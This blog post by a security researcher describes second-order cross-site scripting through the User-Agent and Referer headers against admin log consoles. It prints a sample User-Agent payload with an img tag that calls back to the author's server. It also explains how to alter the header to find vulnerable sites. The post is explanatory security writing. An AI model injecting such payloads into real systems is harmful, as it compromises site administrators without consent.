|User-agent attacks : Exclusives : Blog : Home|
A few years ago I started an experiment to gauge how many Web portals and administrative consoles were vulnerable to second-order cross-site scripting attacks.
At the time, I was investigating the impact of “unexpected” recycling of user-supplied data - since it was proving to be an interesting attack vector for pentests - which led to the whitepaper “Second-order Code Injection” and was ultimately incorporated in to several Web application security testing methodologies.
Anyhow, I was explaining the concept to a colleague a couple of weeks ago and I figured I’d check some Web logs to see if there was still any evidence of the vulnerable consoles. To my surprise, even a couple of years after stopping the project, there were still vulnerable consoles “pinging” away.
Unwanted Content Analysis
At the time I experimented with various fields commonly “analyzed” within administrator portals – such as the REFERER field, ACCEPT, ACCEPT-CHARSET and USER-AGENT. The most consistently vulnerable fields I encountered were REFERER and USER-AGENT. While the REFERER was commonly filtered correctly, I did notice that some popular portals liked to report on things such as “Search Fields” – which was automatically extracted from the REFERER data of say a Google link. However, the most interesting field was the USER-AGENT.
By embedding simple XSS HTML code segments inside the REFERER and USER-AGENT fields such as…
User-Agent: ><img src=”http://www.technicalinfo.net/vulnerable.jpg><!--
… it was possible to elicit a response from the vulnerable portal at a later date when the administrator (or other data analyst) viewed the appropriate reports.
In the end, the USER-AGENT field proved to be the most interesting because it not only got the most results, but because it was the easiest one to test. For example, you can easily modify the USER-AGENT data in Firefox by just adding a new configuration value (read this).
By making use of a simple proxy, you can also dynamically change the USER-AGENT of all Web browser page requests (regardless of the browser in use) to include the host name and later identify the vulnerable site (when you browse your own Web logs). For example, dynamically changing the user agent to:
It actually sounds harder than it is in reality.
Today, the vector is probably even more important. With professional cyber criminal teams seeking to compromise any Web site they can in order to embed malicious drive-by-malware iFrames, host Phishing sites or even increase the Page-Rank of other sites they control to earn money through advertizing; it seems that this attack vector will remain popular for quite some time to come.
That said, I guess I should apologize to a colleague of mine. After having explained how to change his Firefox USER-AGENT details, I suggested that he visit www.whatsmyuseragent.com to make sure that the modifications worked. Unfortunately I happened to get there before him with my own modified USER-AGENT string and it provides a list of the last 18 or so agents… :-)